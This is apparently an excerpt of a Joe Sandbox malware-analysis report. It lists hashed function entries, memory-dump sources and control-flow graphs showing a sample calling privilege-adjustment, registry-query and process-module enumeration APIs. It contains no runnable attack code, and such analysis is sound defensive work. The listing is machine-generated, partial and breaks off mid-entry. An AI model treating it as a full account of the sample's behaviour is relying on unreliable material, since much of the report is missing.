                                  • Instruction ID: 99db12c0a0baeed5c6ee2931e41b37f18a984a6990972d3b933259947b9cb942
                                  • Opcode Fuzzy Hash: 2cd043107bf8883bf2d08620c5ff65f6f212594fd3d124555e75d3293ea11e54
                                  • Instruction Fuzzy Hash: 4141F278904269CFDB60EFA8C588A8EF7B1BB06315F568294D418AB612C730DDC5CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0014D01C Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006482750.000000000014D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0014D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_14d000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 68c67e039a29ade8deef3486f4992e45053a0caee363f8dfeae088b7a3dcc219
                                  • Instruction ID: ce2533ba9c1a0c49626cb340a9b1b460380242e127ad3187af7053405c32d9ad
                                  • Opcode Fuzzy Hash: 68c67e039a29ade8deef3486f4992e45053a0caee363f8dfeae088b7a3dcc219
                                  • Instruction Fuzzy Hash: 53210475608344DFCF15DF20E884B26BBA5FB88318F30C5A9E9094B266C33AD847CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001A54B7 Relevance: .1, Instructions: 70COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 97843902f97751c3d141890181d40542f69dc083fd04ec88661ee05a0d0e3cdd
                                  • Instruction ID: 968d704f73ab9a35f905be9844e853a310c4288b6979e3f3554d904017b4eb3f
                                  • Opcode Fuzzy Hash: 97843902f97751c3d141890181d40542f69dc083fd04ec88661ee05a0d0e3cdd
                                  • Instruction Fuzzy Hash: C63108B8A05268CFDB60DF58C944B8DFBF2BB46314F4681DAE509AB251C7309E84CF64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0014D006 Relevance: .1, Instructions: 63COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006482750.000000000014D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0014D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_14d000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9ea8665f1c6e904147f2957f2aeedbceabfc546b63af0bd92b367267b6e8c2f9
                                  • Instruction ID: 9317fb158c049e0c5bd34ba62ac813ba1452404920b56980b3a986b7cdb67dcf
                                  • Opcode Fuzzy Hash: 9ea8665f1c6e904147f2957f2aeedbceabfc546b63af0bd92b367267b6e8c2f9
                                  • Instruction Fuzzy Hash: DC2162755083809FCB02CF14E994715BF71EB46314F28C5EAD8458B267C33AD856CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001A3138 Relevance: .0, Instructions: 37COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6f60c2b775c80409b203236b119710fde033fd1ec5b017b485d1514d116d81db
                                  • Instruction ID: 91026b3dd4be9f9f88caf06645f5943dba81b6f870b7f30fc8abed93d480c77e
                                  • Opcode Fuzzy Hash: 6f60c2b775c80409b203236b119710fde033fd1ec5b017b485d1514d116d81db
                                  • Instruction Fuzzy Hash: ACF024A9D0D2405FC7059F785C163A5BFA0AB17301F4440EBE401D7662E7308606C722
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001A0778 Relevance: .0, Instructions: 34COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 63b5bc0791500df09c788d1099584d009d29d8d28ce3608d80f222ec45f014b7
                                  • Instruction ID: ef298e4d13dc68109542053f1cf52fed2761b41a437268abf928f8006a798230
                                  • Opcode Fuzzy Hash: 63b5bc0791500df09c788d1099584d009d29d8d28ce3608d80f222ec45f014b7
                                  • Instruction Fuzzy Hash: 23F0676950D2D04FD32787B49D699613F20AB27345B0A02CAD0C6DB8F3D268980ACB22
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001A2C80 Relevance: .0, Instructions: 24COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9f4e78e4be11d7c51570e774119c36df6ae3d244d6444d476dab881426203cac
                                  • Instruction ID: 32a71372fa92fa29b4e4781ef7e23c27ac7d1394bc45de611b71af512164ca0e
                                  • Opcode Fuzzy Hash: 9f4e78e4be11d7c51570e774119c36df6ae3d244d6444d476dab881426203cac
                                  • Instruction Fuzzy Hash: 88F0A837014244AFCB068F80DC44D987FBAFF4A300B0A80E2EA488F132D332E664EB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001A0438 Relevance: .0, Instructions: 23COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d448c8d9763c0988038f19e7bb7168673b8fdce2bfef07fb52793ed6c7752c1f
                                  • Instruction ID: f81a3284adf5ee5a0b38d1317ec1ceb19777ac39294729ed149d7dbf541a6693
                                  • Opcode Fuzzy Hash: d448c8d9763c0988038f19e7bb7168673b8fdce2bfef07fb52793ed6c7752c1f
                                  • Instruction Fuzzy Hash: 55E08C1624E6E41E8B1B63B414235AE2F610E5611430A04AED14A9B2E3CB4D0E4A83B6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001A2C90 Relevance: .0, Instructions: 17COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8b2d2afdf8cc5b7ccea18ced03ba7a08bcfe8e2e892637580233587e30185cdd
                                  • Instruction ID: 44316b20ccf0baa3595b955a128056bead5c2d949d2b9121ad8c580398809a25
                                  • Opcode Fuzzy Hash: 8b2d2afdf8cc5b7ccea18ced03ba7a08bcfe8e2e892637580233587e30185cdd
                                  • Instruction Fuzzy Hash: C7E00936050114AFCB069F80DD48D95BFAAFB5C710B0A8095F6084A032C672D560EB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001A0448 Relevance: .0, Instructions: 16COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9427584c77b207b8fea4f4d6ab8bb60ee93fe0f6f58bdd6edfadef7dd3572ef8
                                  • Instruction ID: 0106595f11186e954e1a548811cb14e74e1f99e42e1dab80e1fda59fc7fb9bec
                                  • Opcode Fuzzy Hash: 9427584c77b207b8fea4f4d6ab8bb60ee93fe0f6f58bdd6edfadef7dd3572ef8
                                  • Instruction Fuzzy Hash: 8CC012223096340B0E1E72B8192367E394A4A859A8715043DE21F9B391DF1E9E4282FA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001A0750 Relevance: .0, Instructions: 11COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 271df17471905d136853b43dee42a8f56c4fda744a12c413f63b199740af0e29
                                  • Instruction ID: 881fd522d186c7ed35f509b46998b6f1ef01e14841a75ae8c3b12b1c90cf240b
                                  • Opcode Fuzzy Hash: 271df17471905d136853b43dee42a8f56c4fda744a12c413f63b199740af0e29
                                  • Instruction Fuzzy Hash: A6C012380102088BC7146B90FE0CA2A73A9F70730AF040264A20E129B28BB02880CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 001A3540 Relevance: .1, Instructions: 71COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3421532083cf676120462fdf1a452ed5705107a8031140d5b694646c08ac1405
                                  • Instruction ID: 319f3b9c0c625bfb564770ff4316b01b51c607203eac85e46602016c68d3584c
                                  • Opcode Fuzzy Hash: 3421532083cf676120462fdf1a452ed5705107a8031140d5b694646c08ac1405
                                  • Instruction Fuzzy Hash: D421EAB5E006288BDB68CF6B9D0068AFAF3AFC9305F14C1FB950CA7254DB301A858F54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:12.7%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:19.4%
                                  Total number of Nodes:31
                                  Total number of Limit Nodes:1
                                  execution_graph 609 1ba519 610 1ba54a RegOpenKeyExW 609->610 612 1ba5d8 610->612 633 1baa7f 634 1baa89 AdjustTokenPrivileges 633->634 636 1bab07 634->636 625 1baedc 626 1baf04 K32GetModuleBaseNameW 625->626 628 1baf8a 626->628 637 1ba873 638 1ba89a LookupPrivilegeValueW 637->638 640 1ba8ea 638->640 613 1ba611 614 1ba652 RegQueryValueExW 613->614 616 1ba6db 614->616 586 1baab6 587 1baae5 AdjustTokenPrivileges 586->587 589 1bab07 587->589 617 1ba309 620 1ba315 CloseHandle 617->620 619 1ba380 620->619 641 1bacec 642 1bad0a K32EnumProcessModules 641->642 644 1bad8e 642->644 605 1ba346 606 1ba372 CloseHandle 605->606 607 1ba3b1 605->607 608 1ba380 606->608 607->606 645 1bade5 646 1badf2 K32GetModuleInformation 645->646 648 1bae7e 646->648

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available
                                  callgraph 0 Function_001BA89A 1 Function_001BA09A 2 Function_001BA519 3 Function_001B2098 4 Function_001BA71C 5 Function_001B2912 6 Function_001BAE12 7 Function_001BA611 8 Function_001B2310 9 Function_001BA416 10 Function_001B2194 11 Function_001BA80A 12 Function_001BA48A 13 Function_001BA309 14 Function_001BAC01 15 Function_001B2006 16 Function_001BAB86 17 Function_001BA005 18 Function_001BA23A 19 Function_00250001 20 Function_001BA3BF 21 Function_001BA93D 22 Function_00250882 23 Function_001B23BC 24 Function_001B213C 25 Function_001BAC32 26 Function_001BAF32 27 Function_001B2430 28 Function_001BA4B6 29 Function_001BAAB6 30 Function_001B22B4 31 Function_001BA92B 32 Function_001BAD2A 33 Function_00250897 34 Function_001BA02E 35 Function_001BA722 36 Function_0025081E 37 Function_001BA120 38 Function_002507E7 39 Function_001B2458 40 Function_001BA9D8 41 Function_00250861 41->22 42 Function_001BAEDC 43 Function_001BA652 44 Function_001BA54A 45 Function_002507F7 46 Function_001BAECD 47 Function_001BAB4C 48 Function_001BA346 49 Function_001B2044 50 Function_001BA078 51 Function_001BAA7F 52 Function_001BA9FE 53 Function_001BA873 54 Function_001BA172 55 Function_0025014C 56 Function_001B21F0 57 Function_001B26F0 58 Function_001B23F4 59 Function_001BA1F4 60 Function_001BA3F4 61 Function_002507D7 62 Function_001BA7E8 63 Function_001BA76E 64 Function_001BACEC 65 Function_001BA962 66 Function_001B2961 67 Function_0025005B 68 Function_001BADE5 69 Function_001B2264 70 Function_001B2364

                                  Executed Functions

                                  Function 001BAA7F Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 70 1baa7f-1baae3 74 1baae8-1baaf7 70->74 75 1baae5 70->75 76 1bab3a-1bab3f 74->76 77 1baaf9-1bab19 AdjustTokenPrivileges 74->77 75->74 76->77 80 1bab1b-1bab37 77->80 81 1bab41-1bab46 77->81 81->80
                                  APIs
                                  • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 001BAAFF
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: AdjustPrivilegesToken
                                  • String ID:
                                  • API String ID: 2874748243-0
                                  • Opcode ID: 49efeeb4f5463c777722a3ce40e99b9bb9e13812686d50f0c9e219b008da2d92
                                  • Instruction ID: 919839d79aeac84f295809f255591ddf32263e0e0211c665d14f72ba26b322c1
                                  • Opcode Fuzzy Hash: 49efeeb4f5463c777722a3ce40e99b9bb9e13812686d50f0c9e219b008da2d92
                                  • Instruction Fuzzy Hash: 8F21A1755097849FDB128F25DC45B92BFB4EF06310F0885DAE9858B163D375A908CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001BAAB6 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 162 1baab6-1baae3 163 1baae8-1baaf7 162->163 164 1baae5 162->164 165 1bab3a-1bab3f 163->165 166 1baaf9-1bab01 AdjustTokenPrivileges 163->166 164->163 165->166 167 1bab07-1bab19 166->167 169 1bab1b-1bab37 167->169 170 1bab41-1bab46 167->170 170->169
                                  APIs
                                  • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 001BAAFF
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: AdjustPrivilegesToken
                                  • String ID:
                                  • API String ID: 2874748243-0
                                  • Opcode ID: fea4778b81c337090bbfbfd1c2440df71b3bacb1ab42df86ff14e1f6db9c7aeb
                                  • Instruction ID: 0ca18966bd47b0352ecc5da79db809ca951afe2b36310dcbc285c097b00cbc61
                                  • Opcode Fuzzy Hash: fea4778b81c337090bbfbfd1c2440df71b3bacb1ab42df86ff14e1f6db9c7aeb
                                  • Instruction Fuzzy Hash: 3711C2355003009FEB21CF65D984BA6FBE4EF04320F08C5AADD498B651D371E404DF62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001BA519 Relevance: 1.6, APIs: 1, Instructions: 90registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 1ba519-1ba5a5 4 1ba5aa-1ba5c1 0->4 5 1ba5a7 0->5 7 1ba603-1ba608 4->7 8 1ba5c3-1ba5d6 RegOpenKeyExW 4->8 5->4 7->8 9 1ba60a-1ba60f 8->9 10 1ba5d8-1ba600 8->10 9->10
                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000E40), ref: 001BA5C9
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: a8f326cd72596b355fdce5840f5505d932ea07d8cc9237b8fd8f2944ec89fef1
                                  • Instruction ID: ee209214540295c68d615efb6fd082354574cc1861e1e08e1fcbecfe940b9e47
                                  • Opcode Fuzzy Hash: a8f326cd72596b355fdce5840f5505d932ea07d8cc9237b8fd8f2944ec89fef1
                                  • Instruction Fuzzy Hash: 1F3181B2508344AFE7228B15DC84FA6BFBCEF46314F08859BE985CB152D364A949CB71
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001BA611 Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 15 1ba611-1ba68f 18 1ba691 15->18 19 1ba694-1ba69d 15->19 18->19 20 1ba69f 19->20 21 1ba6a2-1ba6a8 19->21 20->21 22 1ba6aa 21->22 23 1ba6ad-1ba6c4 21->23 22->23 25 1ba6fb-1ba700 23->25 26 1ba6c6-1ba6d9 RegQueryValueExW 23->26 25->26 27 1ba6db-1ba6f8 26->27 28 1ba702-1ba707 26->28 28->27
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000E40,C28137B5,00000000,00000000,00000000,00000000), ref: 001BA6CC
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: 47cd97ca4602a10877d2ec2445e051bd2aad0e352f147a98b895bd696805626d
                                  • Instruction ID: 74772fffa3838a59f15f2044024c2da5f975cf1767f1e0a56747b2ccc0f761c0
                                  • Opcode Fuzzy Hash: 47cd97ca4602a10877d2ec2445e051bd2aad0e352f147a98b895bd696805626d
                                  • Instruction Fuzzy Hash: 34319375505784AFE722CB21CC85FA2BFF8EF46314F08849AE989CB152D364E949CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001BACEC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 32 1bacec-1bad7e 37 1badcb-1badd0 32->37 38 1bad80-1bad88 K32EnumProcessModules 32->38 37->38 40 1bad8e-1bada0 38->40 41 1badd2-1badd7 40->41 42 1bada2-1badc8 40->42 41->42
                                  APIs
                                  • K32EnumProcessModules.KERNEL32(?,00000E40,C28137B5,00000000,00000000,00000000,00000000), ref: 001BAD86
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: EnumModulesProcess
                                  • String ID:
                                  • API String ID: 1082081703-0
                                  • Opcode ID: 82fc3130bbc23808a0ff4bcc21dbe8cdeb84aed569157ef2b4deaf65abb11973
                                  • Instruction ID: 00bfe68c17bbe6ff7621ac6e99c3a048257ec0cb438d630339985b0f5383bcbf
                                  • Opcode Fuzzy Hash: 82fc3130bbc23808a0ff4bcc21dbe8cdeb84aed569157ef2b4deaf65abb11973
                                  • Instruction Fuzzy Hash: FE21E9B25053806FE7128B64DC44BA6BFB8EF46324F0885DBE985DB193D3249949CB71
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001BADE5 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 45 1bade5-1bae4f 49 1bae51 45->49 50 1bae54-1bae6e 45->50 49->50 52 1baebb-1baec0 50->52 53 1bae70-1bae78 K32GetModuleInformation 50->53 52->53 55 1bae7e-1bae90 53->55 56 1baec2-1baec7 55->56 57 1bae92-1baeb8 55->57 56->57
                                  APIs
                                  • K32GetModuleInformation.KERNEL32(?,00000E40,C28137B5,00000000,00000000,00000000,00000000), ref: 001BAE76
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: InformationModule
                                  • String ID:
                                  • API String ID: 3425974696-0
                                  • Opcode ID: 21817bb224c2f58063c5a26fbe948ddac9f1dfc8b3030a4bc9a0f76d7832fe45
                                  • Instruction ID: f9b0a11abbc03ff6216b19eb0900c93ac1b3135b26ef9b94b6eaacfa5e4cbf81
                                  • Opcode Fuzzy Hash: 21817bb224c2f58063c5a26fbe948ddac9f1dfc8b3030a4bc9a0f76d7832fe45
                                  • Instruction Fuzzy Hash: BE21A671505344AFE711CB55DC44FA6BFACEF46320F08849AE945CB152D374E949CB71
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001BAEDC Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 60 1baedc-1baf2f 62 1baf32-1baf84 K32GetModuleBaseNameW 60->62 64 1baf8a-1bafb3 62->64
                                  APIs
                                  • K32GetModuleBaseNameW.KERNEL32(?,00000E40,?,?), ref: 001BAF82
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: BaseModuleName
                                  • String ID:
                                  • API String ID: 595626670-0
                                  • Opcode ID: 8ea459e5e5fe8d207ad3f44cc9e9a8539b016c978e7baa754cc9a5200aec516a
                                  • Instruction ID: fc3046483f391f387d744c686e4719a999ce770cb45e4740e480184224665b74
                                  • Opcode Fuzzy Hash: 8ea459e5e5fe8d207ad3f44cc9e9a8539b016c978e7baa754cc9a5200aec516a
                                  • Instruction Fuzzy Hash: 4821B1715093C06FD312CB65CC55B66BFB8EF87210F0984DBE8888F293D224A909C7B2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001BA722 Relevance: 1.6, APIs: 1, Instructions: 77registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 66 1ba722-1ba76b 67 1ba76e-1ba7c6 RegQueryValueExW 66->67 69 1ba7cc-1ba7e2 67->69
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000E40,?,?), ref: 001BA7BE
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: 262d7a61651187058349001195a8a07bba35842f867805634d24a33437343b0d
                                  • Instruction ID: e68295efb1a5944d23326f2e054e9f1d747aa1389febe4f5233d76c0885fd5c4
                                  • Opcode Fuzzy Hash: 262d7a61651187058349001195a8a07bba35842f867805634d24a33437343b0d
                                  • Instruction Fuzzy Hash: F721F57554D3C06FD3138B259C51B62BFB8EF87610F0981DBE8888B693D225691AC7B2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001BA54A Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 83 1ba54a-1ba5a5 86 1ba5aa-1ba5c1 83->86 87 1ba5a7 83->87 89 1ba603-1ba608 86->89 90 1ba5c3-1ba5d6 RegOpenKeyExW 86->90 87->86 89->90 91 1ba60a-1ba60f 90->91 92 1ba5d8-1ba600 90->92 91->92
                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000E40), ref: 001BA5C9
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: ea056c56e1f99841572ded07ea7f6d700c38cb1ee5b05661720c3c761e9c3e01
                                  • Instruction ID: 4045d37ff0a1fdc32aee44d9e7bca8f0494dff739f0269b4d2c868954b4f4cff
                                  • Opcode Fuzzy Hash: ea056c56e1f99841572ded07ea7f6d700c38cb1ee5b05661720c3c761e9c3e01
                                  • Instruction Fuzzy Hash: FE21A472500204AFFB21DF55DC84FAAFBECEF44320F04855AE945C6241D774E6098B75
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001BA652 Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 97 1ba652-1ba68f 99 1ba691 97->99 100 1ba694-1ba69d 97->100 99->100 101 1ba69f 100->101 102 1ba6a2-1ba6a8 100->102 101->102 103 1ba6aa 102->103 104 1ba6ad-1ba6c4 102->104 103->104 106 1ba6fb-1ba700 104->106 107 1ba6c6-1ba6d9 RegQueryValueExW 104->107 106->107 108 1ba6db-1ba6f8 107->108 109 1ba702-1ba707 107->109 109->108
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000E40,C28137B5,00000000,00000000,00000000,00000000), ref: 001BA6CC
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: 307dbbd0b1eec1ec6e2632cd5c84b72ab01b52cbb0447d9cf37f56e65f8e6d79
                                  • Instruction ID: 0e4281c30b8193b467b2e2b110ba5125f6f006c953bbd87004478004262a1277
                                  • Opcode Fuzzy Hash: 307dbbd0b1eec1ec6e2632cd5c84b72ab01b52cbb0447d9cf37f56e65f8e6d79
                                  • Instruction Fuzzy Hash: 7221AFB6600604AFE721CF15CC84FA6F7ECEF48720F08856AE949CB251D774E949CA72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001BAE12 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 113 1bae12-1bae4f 115 1bae51 113->115 116 1bae54-1bae6e 113->116 115->116 118 1baebb-1baec0 116->118 119 1bae70-1bae78 K32GetModuleInformation 116->119 118->119 121 1bae7e-1bae90 119->121 122 1baec2-1baec7 121->122 123 1bae92-1baeb8 121->123 122->123
                                  APIs
                                  • K32GetModuleInformation.KERNEL32(?,00000E40,C28137B5,00000000,00000000,00000000,00000000), ref: 001BAE76
                                  Memory Dump Source
